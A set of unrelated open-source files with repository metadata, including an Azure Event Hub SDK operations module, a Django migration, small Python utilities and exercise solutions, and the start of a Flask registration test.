from typing import Any, AsyncIterable, Callable, Dict, IO, Optional, TypeVar, Union, cast, overload
import urllib.parse
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import (
ClientAuthenticationError,
HttpResponseError,
ResourceExistsError,
ResourceNotFoundError,
ResourceNotModifiedError,
map_error,
)
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse
from azure.core.polling import AsyncLROPoller, AsyncNoPolling, AsyncPollingMethod
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.core.tracing.decorator_async import distributed_trace_async
from azure.core.utils import case_insensitive_dict
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.async_arm_polling import AsyncARMPolling
from ... import models as _models
from ..._vendor import _convert_request
from ...operations._private_endpoint_connections_operations import (
build_create_or_update_request,
build_delete_request,
build_get_request,
build_list_request,
)
if sys.version_info >= (3, 8):
from typing import Literal # pylint: disable=no-name-in-module, ungrouped-imports
else:
from typing_extensions import Literal # type: ignore # pylint: disable=ungrouped-imports
T = TypeVar("T")
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class PrivateEndpointConnectionsOperations:
"""
.. warning::
**DO NOT** instantiate this class directly.
Instead, you should access the following operations through
:class:`~azure.mgmt.eventhub.v2021_11_01.aio.EventHubManagementClient`'s
:attr:`private_endpoint_connections` attribute.
"""
models = _models
def __init__(self, *args, **kwargs) -> None:
input_args = list(args)
self._client = input_args.pop(0) if input_args else kwargs.pop("client")
self._config = input_args.pop(0) if input_args else kwargs.pop("config")
self._serialize = input_args.pop(0) if input_args else kwargs.pop("serializer")
self._deserialize = input_args.pop(0) if input_args else kwargs.pop("deserializer")
@distributed_trace
def list(
self, resource_group_name: str, namespace_name: str, **kwargs: Any
) -> AsyncIterable["_models.PrivateEndpointConnection"]:
"""Gets the available PrivateEndpointConnections within a namespace.
.. seealso::
- https://msdn.microsoft.com/en-us/library/azure/mt639412.aspx
:param resource_group_name: Name of the resource group within the azure subscription. Required.
:type resource_group_name: str
:param namespace_name: The Namespace name. Required.
:type namespace_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either PrivateEndpointConnection or the result of
cls(response)
:rtype:
~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.eventhub.v2021_11_01.models.PrivateEndpointConnection]
:raises ~azure.core.exceptions.HttpResponseError:
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2021-11-01"] = kwargs.pop("api_version", _params.pop("api-version", "2021-11-01"))
cls: ClsType[_models.PrivateEndpointConnectionListResult] = kwargs.pop("cls", None)
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
def prepare_request(next_link=None):
if not next_link:
request = build_list_request(
resource_group_name=resource_group_name,
namespace_name=namespace_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.list.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
else:
# make call to next link with the client's api-version
_parsed_next_link = urllib.parse.urlparse(next_link)
_next_request_params = case_insensitive_dict(
{
key: [urllib.parse.quote(v) for v in value]
for key, value in urllib.parse.parse_qs(_parsed_next_link.query).items()
}
)
_next_request_params["api-version"] = self._config.api_version
request = HttpRequest(
"GET", urllib.parse.urljoin(next_link, _parsed_next_link.path), params=_next_request_params
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
request.method = "GET"
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize("PrivateEndpointConnectionListResult", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem) # type: ignore
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response: PipelineResponse = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(get_next, extract_data)
list.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.EventHub/namespaces/{namespaceName}/privateEndpointConnections"
}
@overload
async def create_or_update(
    self,
    resource_group_name: str,
    namespace_name: str,
    private_endpoint_connection_name: str,
    parameters: _models.PrivateEndpointConnection,
    *,
    content_type: str = "application/json",
    **kwargs: Any
) -> _models.PrivateEndpointConnection:
    """Creates or updates PrivateEndpointConnections of service namespace.

    Overload for a model-typed ``parameters`` body (serialized as JSON).

    .. seealso::
       - https://msdn.microsoft.com/en-us/library/azure/mt639408.aspx

    :param resource_group_name: Name of the resource group within the azure subscription. Required.
    :type resource_group_name: str
    :param namespace_name: The Namespace name. Required.
    :type namespace_name: str
    :param private_endpoint_connection_name: The PrivateEndpointConnection name. Required.
    :type private_endpoint_connection_name: str
    :param parameters: Parameters supplied to update Status of PrivateEndPoint Connection to
     namespace resource. Required.
    :type parameters: ~azure.mgmt.eventhub.v2021_11_01.models.PrivateEndpointConnection
    :keyword content_type: Body Parameter content-type. Content type parameter for JSON body.
     Default value is "application/json".
    :paramtype content_type: str
    :keyword callable cls: A custom type or function that will be passed the direct response
    :return: PrivateEndpointConnection or the result of cls(response)
    :rtype: ~azure.mgmt.eventhub.v2021_11_01.models.PrivateEndpointConnection
    :raises ~azure.core.exceptions.HttpResponseError:
    """

@overload
async def create_or_update(
    self,
    resource_group_name: str,
    namespace_name: str,
    private_endpoint_connection_name: str,
    parameters: IO,
    *,
    content_type: str = "application/json",
    **kwargs: Any
) -> _models.PrivateEndpointConnection:
    """Creates or updates PrivateEndpointConnections of service namespace.

    Overload for a raw binary/stream ``parameters`` body.

    .. seealso::
       - https://msdn.microsoft.com/en-us/library/azure/mt639408.aspx

    :param resource_group_name: Name of the resource group within the azure subscription. Required.
    :type resource_group_name: str
    :param namespace_name: The Namespace name. Required.
    :type namespace_name: str
    :param private_endpoint_connection_name: The PrivateEndpointConnection name. Required.
    :type private_endpoint_connection_name: str
    :param parameters: Parameters supplied to update Status of PrivateEndPoint Connection to
     namespace resource. Required.
    :type parameters: IO
    :keyword content_type: Body Parameter content-type. Content type parameter for binary body.
     Default value is "application/json".
    :paramtype content_type: str
    :keyword callable cls: A custom type or function that will be passed the direct response
    :return: PrivateEndpointConnection or the result of cls(response)
    :rtype: ~azure.mgmt.eventhub.v2021_11_01.models.PrivateEndpointConnection
    :raises ~azure.core.exceptions.HttpResponseError:
    """

@distributed_trace_async
async def create_or_update(
    self,
    resource_group_name: str,
    namespace_name: str,
    private_endpoint_connection_name: str,
    parameters: Union[_models.PrivateEndpointConnection, IO],
    **kwargs: Any
) -> _models.PrivateEndpointConnection:
    """Creates or updates PrivateEndpointConnections of service namespace.

    .. seealso::
       - https://msdn.microsoft.com/en-us/library/azure/mt639408.aspx

    :param resource_group_name: Name of the resource group within the azure subscription. Required.
    :type resource_group_name: str
    :param namespace_name: The Namespace name. Required.
    :type namespace_name: str
    :param private_endpoint_connection_name: The PrivateEndpointConnection name. Required.
    :type private_endpoint_connection_name: str
    :param parameters: Parameters supplied to update Status of PrivateEndPoint Connection to
     namespace resource. Is either a PrivateEndpointConnection type or a IO type. Required.
    :type parameters: ~azure.mgmt.eventhub.v2021_11_01.models.PrivateEndpointConnection or IO
    :keyword content_type: Body Parameter content-type. Known values are: 'application/json'.
     Default value is None.
    :paramtype content_type: str
    :keyword callable cls: A custom type or function that will be passed the direct response
    :return: PrivateEndpointConnection or the result of cls(response)
    :rtype: ~azure.mgmt.eventhub.v2021_11_01.models.PrivateEndpointConnection
    :raises ~azure.core.exceptions.HttpResponseError:
    """
    # Map common HTTP failure codes onto azure-core exception types; entries
    # can be extended/overridden by the caller through the `error_map` kwarg.
    error_map = {
        401: ClientAuthenticationError,
        404: ResourceNotFoundError,
        409: ResourceExistsError,
        304: ResourceNotModifiedError,
    }
    error_map.update(kwargs.pop("error_map", {}) or {})

    _headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
    _params = case_insensitive_dict(kwargs.pop("params", {}) or {})

    api_version: Literal["2021-11-01"] = kwargs.pop("api_version", _params.pop("api-version", "2021-11-01"))
    content_type: Optional[str] = kwargs.pop("content_type", _headers.pop("Content-Type", None))
    cls: ClsType[_models.PrivateEndpointConnection] = kwargs.pop("cls", None)

    # Default to JSON when the caller did not specify a content type.
    content_type = content_type or "application/json"
    _json = None
    _content = None
    # Raw streams/bytes are sent as-is; model objects are serialized to JSON.
    if isinstance(parameters, (IO, bytes)):
        _content = parameters
    else:
        _json = self._serialize.body(parameters, "PrivateEndpointConnection")

    request = build_create_or_update_request(
        resource_group_name=resource_group_name,
        namespace_name=namespace_name,
        private_endpoint_connection_name=private_endpoint_connection_name,
        subscription_id=self._config.subscription_id,
        api_version=api_version,
        content_type=content_type,
        json=_json,
        content=_content,
        template_url=self.create_or_update.metadata["url"],
        headers=_headers,
        params=_params,
    )
    request = _convert_request(request)
    request.url = self._client.format_url(request.url)

    pipeline_response: PipelineResponse = await self._client._pipeline.run(  # pylint: disable=protected-access
        request, stream=False, **kwargs
    )
    response = pipeline_response.http_response

    if response.status_code not in [200, 201]:
        map_error(status_code=response.status_code, response=response, error_map=error_map)
        error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
        raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)

    # Both 200 (updated) and 201 (created) carry the same response model; the
    # generator keeps the branches separate.
    if response.status_code == 200:
        deserialized = self._deserialize("PrivateEndpointConnection", pipeline_response)

    if response.status_code == 201:
        deserialized = self._deserialize("PrivateEndpointConnection", pipeline_response)

    if cls:
        return cls(pipeline_response, deserialized, {})  # type: ignore

    return deserialized  # type: ignore

create_or_update.metadata = {
    "url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.EventHub/namespaces/{namespaceName}/privateEndpointConnections/{privateEndpointConnectionName}"
}
async def _delete_initial(  # pylint: disable=inconsistent-return-statements
    self, resource_group_name: str, namespace_name: str, private_endpoint_connection_name: str, **kwargs: Any
) -> None:
    """Issue the initial DELETE request of the long-running delete operation.

    Returns ``None`` (or ``cls(...)`` when a custom response hook is given);
    raises :class:`HttpResponseError` for any status other than 200/202/204.
    """
    # Map common HTTP failure codes onto azure-core exception types; entries
    # can be overridden by the caller through the `error_map` kwarg.
    error_map = {
        401: ClientAuthenticationError,
        404: ResourceNotFoundError,
        409: ResourceExistsError,
        304: ResourceNotModifiedError,
    }
    error_map.update(kwargs.pop("error_map", {}) or {})

    _headers = kwargs.pop("headers", {}) or {}
    _params = case_insensitive_dict(kwargs.pop("params", {}) or {})

    api_version: Literal["2021-11-01"] = kwargs.pop("api_version", _params.pop("api-version", "2021-11-01"))
    cls: ClsType[None] = kwargs.pop("cls", None)

    request = build_delete_request(
        resource_group_name=resource_group_name,
        namespace_name=namespace_name,
        private_endpoint_connection_name=private_endpoint_connection_name,
        subscription_id=self._config.subscription_id,
        api_version=api_version,
        template_url=self._delete_initial.metadata["url"],
        headers=_headers,
        params=_params,
    )
    request = _convert_request(request)
    request.url = self._client.format_url(request.url)

    pipeline_response: PipelineResponse = await self._client._pipeline.run(  # pylint: disable=protected-access
        request, stream=False, **kwargs
    )
    response = pipeline_response.http_response

    if response.status_code not in [200, 202, 204]:
        map_error(status_code=response.status_code, response=response, error_map=error_map)
        error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
        raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)

    if cls:
        return cls(pipeline_response, None, {})

_delete_initial.metadata = {
    "url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.EventHub/namespaces/{namespaceName}/privateEndpointConnections/{privateEndpointConnectionName}"
}
@distributed_trace_async
async def begin_delete(
    self, resource_group_name: str, namespace_name: str, private_endpoint_connection_name: str, **kwargs: Any
) -> AsyncLROPoller[None]:
    """Deletes a Private Endpoint Connection.

    .. seealso::
       - https://msdn.microsoft.com/en-us/library/azure/mt639389.aspx

    :param resource_group_name: Name of the resource group within the azure subscription. Required.
    :type resource_group_name: str
    :param namespace_name: The Namespace name. Required.
    :type namespace_name: str
    :param private_endpoint_connection_name: The PrivateEndpointConnection name. Required.
    :type private_endpoint_connection_name: str
    :keyword callable cls: A custom type or function that will be passed the direct response
    :keyword str continuation_token: A continuation token to restart a poller from a saved state.
    :keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
     this operation to not poll, or pass in your own initialized polling object for a personal
     polling strategy.
    :paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
    :keyword int polling_interval: Default waiting time between two polls for LRO operations if no
     Retry-After header is present.
    :return: An instance of AsyncLROPoller that returns either None or the result of cls(response)
    :rtype: ~azure.core.polling.AsyncLROPoller[None]
    :raises ~azure.core.exceptions.HttpResponseError:
    """
    _headers = kwargs.pop("headers", {}) or {}
    _params = case_insensitive_dict(kwargs.pop("params", {}) or {})

    api_version: Literal["2021-11-01"] = kwargs.pop("api_version", _params.pop("api-version", "2021-11-01"))
    cls: ClsType[None] = kwargs.pop("cls", None)
    polling: Union[bool, AsyncPollingMethod] = kwargs.pop("polling", True)
    lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
    cont_token: Optional[str] = kwargs.pop("continuation_token", None)
    # Only send the initial DELETE when we are not resuming from a saved
    # continuation token.
    if cont_token is None:
        raw_result = await self._delete_initial(  # type: ignore
            resource_group_name=resource_group_name,
            namespace_name=namespace_name,
            private_endpoint_connection_name=private_endpoint_connection_name,
            api_version=api_version,
            cls=lambda x, y, z: x,
            headers=_headers,
            params=_params,
            **kwargs
        )
    kwargs.pop("error_map", None)

    def get_long_running_output(pipeline_response):  # pylint: disable=inconsistent-return-statements
        # Delete produces no body; only invoke the optional response hook.
        if cls:
            return cls(pipeline_response, None, {})

    # Pick the polling strategy: default ARM polling, no polling, or a
    # caller-provided polling method.
    if polling is True:
        polling_method: AsyncPollingMethod = cast(AsyncPollingMethod, AsyncARMPolling(lro_delay, **kwargs))
    elif polling is False:
        polling_method = cast(AsyncPollingMethod, AsyncNoPolling())
    else:
        polling_method = polling
    if cont_token:
        return AsyncLROPoller.from_continuation_token(
            polling_method=polling_method,
            continuation_token=cont_token,
            client=self._client,
            deserialization_callback=get_long_running_output,
        )
    return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)  # type: ignore

begin_delete.metadata = {
    "url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.EventHub/namespaces/{namespaceName}/privateEndpointConnections/{privateEndpointConnectionName}"
}
@distributed_trace_async
async def get(
    self, resource_group_name: str, namespace_name: str, private_endpoint_connection_name: str, **kwargs: Any
) -> _models.PrivateEndpointConnection:
    """Gets a description for the specified Private Endpoint Connection name.

    .. seealso::
       - https://msdn.microsoft.com/en-us/library/azure/mt639379.aspx

    :param resource_group_name: Name of the resource group within the azure subscription. Required.
    :type resource_group_name: str
    :param namespace_name: The Namespace name. Required.
    :type namespace_name: str
    :param private_endpoint_connection_name: The PrivateEndpointConnection name. Required.
    :type private_endpoint_connection_name: str
    :keyword callable cls: A custom type or function that will be passed the direct response
    :return: PrivateEndpointConnection or the result of cls(response)
    :rtype: ~azure.mgmt.eventhub.v2021_11_01.models.PrivateEndpointConnection
    :raises ~azure.core.exceptions.HttpResponseError:
    """
    # Map common HTTP failure codes onto azure-core exception types; entries
    # can be overridden by the caller through the `error_map` kwarg.
    error_map = {
        401: ClientAuthenticationError,
        404: ResourceNotFoundError,
        409: ResourceExistsError,
        304: ResourceNotModifiedError,
    }
    error_map.update(kwargs.pop("error_map", {}) or {})

    _headers = kwargs.pop("headers", {}) or {}
    _params = case_insensitive_dict(kwargs.pop("params", {}) or {})

    api_version: Literal["2021-11-01"] = kwargs.pop("api_version", _params.pop("api-version", "2021-11-01"))
    cls: ClsType[_models.PrivateEndpointConnection] = kwargs.pop("cls", None)

    # Build the GET request from the templated ARM URL, then resolve it
    # against the client's base endpoint.
    request = build_get_request(
        resource_group_name=resource_group_name,
        namespace_name=namespace_name,
        private_endpoint_connection_name=private_endpoint_connection_name,
        subscription_id=self._config.subscription_id,
        api_version=api_version,
        template_url=self.get.metadata["url"],
        headers=_headers,
        params=_params,
    )
    request = _convert_request(request)
    request.url = self._client.format_url(request.url)

    pipeline_response: PipelineResponse = await self._client._pipeline.run(  # pylint: disable=protected-access
        request, stream=False, **kwargs
    )
    response = pipeline_response.http_response

    if response.status_code not in [200]:
        map_error(status_code=response.status_code, response=response, error_map=error_map)
        error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
        raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)

    deserialized = self._deserialize("PrivateEndpointConnection", pipeline_response)

    if cls:
        return cls(pipeline_response, deserialized, {})

    return deserialized

get.metadata = {
    "url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.EventHub/namespaces/{namespaceName}/privateEndpointConnections/{privateEndpointConnectionName}"
}
| [
"noreply@github.com"
] | kurtzeborn.noreply@github.com |
67f1aeaeeb28bc19427a45aebf9aaacfbf59f93d | 308f5596f1c7d382520cfce13ceaa5dff6f4f783 | /hphp/runtime/ext/core/typecheck_systemlib.py | e9f409239b23debb5a63ec1f6f2cae32f105a0be | [
"PHP-3.01",
"Zend-2.0",
"MIT"
] | permissive | facebook/hhvm | 7e200a309a1cad5304621b0516f781c689d07a13 | d8203129dc7e7bf8639a2b99db596baad3d56b46 | refs/heads/master | 2023-09-04T04:44:12.892628 | 2023-09-04T00:43:05 | 2023-09-04T00:43:05 | 455,600 | 10,335 | 2,326 | NOASSERTION | 2023-09-14T21:24:04 | 2010-01-02T01:17:06 | C++ | UTF-8 | Python | false | false | 2,205 | py | #!/usr/bin/env python3
# Gather all of the relevant files from buck file groups and execute
# `hh_single_type_check` with the correct flags
import argparse
import os
import subprocess as p
import sys
from typing import List
# Hack error codes that systemlib files are permitted to suppress via
# HH_FIXME / decl fixme pragmas.
FIXME_CODES: List[int] = [
    # "Missing symbol:" used to break dependency cycles between files that might
    # be mutually recursive or referential in some form (e.g.: any class with
    # a `__Sealed` attribute).
    2049,
    # "Memoizing object parameters requires the capability AccessGlobals:" for
    # now, we're allowing this in some places like `create_opaque_value`
    4447,
    # There are some functions that don't have *quite* correct coeffects; if
    # we're going to change these it should be done separate from an initial
    # pass making systemlib "clean."
    4390,
]

# Flags passed to every `hh_single_type_check` invocation.
FLAGS: List[str] = [
    "--no-builtins",
    "--is-systemlib",
    # "--everything-sdt",
    "--config",
    "enable_no_auto_dynamic=true",
    "--enable-sound-dynamic-type",
    # TODO(T118594542)
    "--allowed-fixme-codes-strict",
    ",".join(map(str, FIXME_CODES)),
    "--allowed-decl-fixme-codes",
    ",".join(map(str, FIXME_CODES)),
]
def get_files_in(path: str) -> List[str]:
    """Recursively collect the path of every file under *path*."""
    return [
        os.path.join(dirpath, filename)
        for dirpath, _, filenames in os.walk(path)
        for filename in filenames
    ]
def main():
    """Parse arguments, gather files under the given paths, and run
    `hh_single_type_check` with the systemlib flags, propagating its exit
    status."""
    parser = argparse.ArgumentParser(
        description="Gather PHP files in given directories and run `hh_single_type_check`"
    )
    parser.add_argument("paths", type=str, help="paths to traverse", nargs="+")
    parser.add_argument("--hhstc-path", type=str, help="`hh_single_type_check` to run")
    parser.add_argument(
        "--report-number-of-files",
        action="store_true",
        help="instead of running the typechecker, just print the number of files we'd typecheck",
    )
    args = parser.parse_args()

    files = []
    for path in args.paths:
        files.extend(get_files_in(path))

    if args.report_number_of_files:
        # NOTE(review): the count only includes files ending in "php", while
        # the type-check invocation below passes every gathered file --
        # confirm this asymmetry is intended.
        print(len(list(filter(lambda f: f.endswith("php"), files))))
        return

    # Exit with the type checker's own return code.
    sys.exit(p.run([args.hhstc_path] + FLAGS + files).returncode)

if __name__ == "__main__":
    main()
| [
"facebook-github-bot@users.noreply.github.com"
] | facebook-github-bot@users.noreply.github.com |
a0198bbf0a9488b28990a3671c5ad8a112155fad | 47eb0c1ee39b673dc027f6e076b5065a76f3e002 | /setup.py | f4d718bc37e836453f711edc808cbcc7d40edcc5 | [
"BSD-3-Clause"
] | permissive | vodkabuaa/tushare | 6b814efd829519df596072b644f7c78c63c59289 | e55394e0fb6da0bd7652e11f806ad7e92b63c11c | refs/heads/master | 2021-01-15T11:20:49.527125 | 2015-01-16T16:06:55 | 2015-01-16T16:06:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,379 | py | from distutils.core import setup
import codecs
import os
def read(fname):
    """Return the contents of *fname*, resolved relative to this file's
    directory.

    Uses a context manager so the file handle is closed deterministically;
    the original left the handle open until garbage collection.
    """
    path = os.path.join(os.path.dirname(__file__), fname)
    with codecs.open(path) as handle:
        return handle.read()
# Long description shown on PyPI (reStructuredText).
long_desc = """
tushare
===============

.. image:: https://api.travis-ci.org/waditu/tushare.png?branch=master
    :target: https://travis-ci.org/waditu/tushare

.. image:: https://badge.fury.io/py/tushare.png
    :target: http://badge.fury.io/py/tushare

* easy to use as most of the data returned are pandas DataFrame objects
* can be easily saved as csv, excel or json files
* can be inserted into MySQL or Mongodb

Target Users
--------------

* financial market analyst of China
* learners of financial data analysis with pandas/NumPy
* people who are interested in China financial data

Installation
--------------

    pip install tushare

"""

setup(
    name='tushare',
    version='0.1.4',
    description='TuShare is a utility for crawling historical and Realtime Quotes data of China stocks',
    # NOTE(review): filename typo below -- "READM.rst" (missing E); fix
    # before re-enabling file-based long descriptions.
    # long_description=read("READM.rst"),
    long_description = long_desc,
    author='Jimmy Liu',
    author_email='jimmysoa@sina.cn',
    license='BSD',
    url='https://github.com/waditu/tushare',
    keywords='china stock data',
    classifiers=['Development Status :: 4 - Beta',
                 'Programming Language :: Python :: 2.7',
                 'License :: OSI Approved :: BSD License'],
    packages=['tushare', 'tushare.stock'],
)
"jimmysoa@sina.cn"
] | jimmysoa@sina.cn |
1113cfabb2b7978181ed09de71a1dfa228f71d30 | 781e2692049e87a4256320c76e82a19be257a05d | /all_data/exercism_data/python/leap/03ab2a36557f4b3b8efc8905048ad923.py | 040c64db6703a4c6f58c5d9e3ed1f2307d9f5600 | [] | no_license | itsolutionscorp/AutoStyle-Clustering | 54bde86fe6dbad35b568b38cfcb14c5ffaab51b0 | be0e2f635a7558f56c61bc0b36c6146b01d1e6e6 | refs/heads/master | 2020-12-11T07:27:19.291038 | 2016-03-16T03:18:00 | 2016-03-16T03:18:42 | 59,454,921 | 4 | 0 | null | 2016-05-23T05:40:56 | 2016-05-23T05:40:56 | null | UTF-8 | Python | false | false | 122 | py | __author__ = 'citypulse-dp'
def is_leap_year(year):
    """Return True if *year* is a leap year under the Gregorian rules."""
    if year % 4:
        return False
    if year % 100:
        return True
    return year % 400 == 0
| [
"rrc@berkeley.edu"
] | rrc@berkeley.edu |
41177f6514241ed36d01522abc646d69ddfca634 | 6b7857c209b9c30ec6b1bb0c7437f8f9918044d7 | /2908.py | b053aee91226d487002bed4d9beab74ba1300acc | [] | no_license | rheehot/week01-algorithm | 1a18fe8eb76bed0b7d8f26fc10736c7e0c82ec12 | 0eab27bfcad265ca2dafaf64b2ae067a1ba17639 | refs/heads/main | 2023-02-05T06:46:38.006682 | 2020-12-16T14:47:26 | 2020-12-16T14:47:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 410 | py | # 상수 -
# Baekjoon 2908 ("Sangsu"): read two three-digit numbers, reverse each one's
# digits, and print the larger of the two reversed values.
#
# Fixes vs. the original digit-by-digit comparison:
#   * when both reversals were equal, the original loop fell through and
#     printed NOTHING; max() always prints a result.
#   * removes the duplicated commented-out copy of the same loop.
#
# Reversing the digit string and comparing as integers is equivalent to the
# original comparison from the last digit down (the problem guarantees no
# zero digits, so no leading-zero issue arises when printing as int).
a, b = input().split()
print(max(int(a[::-1]), int(b[::-1])))
| [
"jeongseo21@gmail.com"
] | jeongseo21@gmail.com |
3ceda185f764f5098f155d032e070beabe840183 | 6a7ca83203b1757c57fde550dc38babcad60b4e1 | /web/opsgrid/core/migrations/0003_auto_20200606_1547.py | fdbc7d9f8267f2739bc58def3eacaf991f64f01e | [
"MIT"
] | permissive | simon-weber/opsgrid | 78b6e1b01079f3447ddb97d6e5bd93f6a39fc16b | 9719b9438a4a17eb75b638613a20b534ef82edc7 | refs/heads/master | 2023-03-30T13:45:09.195901 | 2021-04-01T19:58:38 | 2021-04-01T19:58:38 | 353,765,970 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,784 | py | # Generated by Django 2.2.9 on 2020-06-06 15:47
import django.db.models.deletion
import django.utils.timezone
from django.conf import settings
from django.db import migrations, models
import opsgrid.core.models
class Migration(migrations.Migration):
    """Create the Alert, Host and AlertStatus models plus their relations.

    Auto-generated by Django 2.2.9 on 2020-06-06. Likely already applied to
    existing databases -- do not restructure; only annotate.
    """

    dependencies = [
        ("core", "0002_auto_20200530_2351"),
    ]

    operations = [
        migrations.CreateModel(
            name="Alert",
            fields=[
                (
                    "id",
                    models.AutoField(
                        auto_created=True,
                        primary_key=True,
                        serialize=False,
                        verbose_name="ID",
                    ),
                ),
                # Serialized JsonLogic rule evaluated against metric rows.
                ("jsonlogic_json", models.TextField()),
                ("last_updated_at", models.DateTimeField(auto_now=True)),
            ],
        ),
        migrations.CreateModel(
            name="Host",
            fields=[
                (
                    "id",
                    models.AutoField(
                        auto_created=True,
                        primary_key=True,
                        serialize=False,
                        verbose_name="ID",
                    ),
                ),
                ("name", models.CharField(max_length=256)),
                (
                    "state",
                    models.CharField(
                        # Stored value comes from the HostState enum ("ACT").
                        choices=[(opsgrid.core.models.HostState("ACT"), "ACT")],
                        default="ACT",
                        max_length=3,
                    ),
                ),
                ("created_at", models.DateTimeField(auto_now_add=True)),
                ("last_data_at", models.DateTimeField(null=True)),
                ("last_metric_row_json", models.TextField(blank=True)),
                ("header_types_json", models.TextField(blank=True)),
                (
                    "user",
                    models.ForeignKey(
                        on_delete=django.db.models.deletion.CASCADE,
                        to=settings.AUTH_USER_MODEL,
                    ),
                ),
            ],
        ),
        migrations.CreateModel(
            name="AlertStatus",
            fields=[
                (
                    "id",
                    models.AutoField(
                        auto_created=True,
                        primary_key=True,
                        serialize=False,
                        verbose_name="ID",
                    ),
                ),
                (
                    "state",
                    models.CharField(
                        # NOTE(review): stored choice value "ALARM" is 5
                        # characters but max_length is 3 -- saving that state
                        # would be truncated/rejected depending on backend.
                        # Confirm against later migrations.
                        choices=[
                            ("ALARM", "ALM"),
                            ("OK", "OK"),
                        ],
                        default="OK",
                        max_length=3,
                    ),
                ),
                (
                    "last_change_at",
                    models.DateTimeField(default=django.utils.timezone.now),
                ),
                ("change_metric_row_json", models.TextField(blank=True)),
                (
                    "alert",
                    models.OneToOneField(
                        on_delete=django.db.models.deletion.CASCADE, to="core.Alert"
                    ),
                ),
            ],
        ),
        migrations.AddField(
            model_name="alert",
            name="host",
            field=models.ForeignKey(
                on_delete=django.db.models.deletion.CASCADE, to="core.Host"
            ),
        ),
        migrations.AddConstraint(
            model_name="host",
            constraint=models.UniqueConstraint(
                fields=("name", "user"), name="unique_host_per_user"
            ),
        ),
    ]
| [
"simon@simonmweber.com"
] | simon@simonmweber.com |
10afc6582717758e6a1c4680f3330b5869a0a8ab | 8019f0df9a782b825132a328f1425fbe3028e657 | /odoo/addons/splashsync/models/__init__.py | 06a199a4ac86223a4739e58a11eaf9d1050c4bff | [] | no_license | p403n1x/odoo | 01b5e28eb1351c04d9045a1fb16e30de45c7929d | ce2cd03b3a9a8b5cfa5a81cf2b70ecafe5fb1ce2 | refs/heads/master | 2023-01-03T17:29:55.322847 | 2020-10-28T15:21:44 | 2020-10-28T15:21:44 | 280,176,919 | 0 | 1 | null | 2020-10-28T15:21:46 | 2020-07-16T14:33:56 | Python | UTF-8 | Python | false | false | 611 | py | # -*- coding: utf-8 -*-
#
# This file is part of SplashSync Project.
#
# Copyright (C) 2015-2019 Splash Sync <www.splashsync.com>
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
#
# For the full copyright and license information, please view the LICENSE
# file that was distributed with this source code.
#
from . import authentification
from . import configuration
from . import partner
from . import product
from . import product_template
from . import order
| [
"eshop.bpaquier@gmail.com"
] | eshop.bpaquier@gmail.com |
018c098be0eb7d6c35d84417bd949c4b65953d0a | 290fa984448c3350fa4059fa8852f8a1321109ab | /services/users/src/tests/test_auth.py | 7dd4fe5f2cebc3ad872c2a74d435400353e40d41 | [] | no_license | testdrivenio/flask-react-aws | 673a612ae3368e7a9dcd7ddb50c0ea03e3221928 | 365f0771d5234b0b4dfe05d59bab29a03845af4f | refs/heads/master | 2023-07-19T19:45:14.042103 | 2022-05-04T16:08:52 | 2022-05-04T16:08:52 | 198,724,692 | 29 | 21 | null | 2023-07-19T14:39:18 | 2019-07-24T23:54:07 | Python | UTF-8 | Python | false | false | 6,254 | py | import json
import pytest
from flask import current_app
def test_user_registration(test_app, test_database):
    """A valid registration returns 201 and echoes only public profile data."""
    payload = {
        "username": "justatest",
        "email": "test@test.com",
        "password": "123456",
    }
    response = test_app.test_client().post(
        "/auth/register",
        data=json.dumps(payload),
        content_type="application/json",
    )
    body = json.loads(response.data.decode())
    assert response.status_code == 201
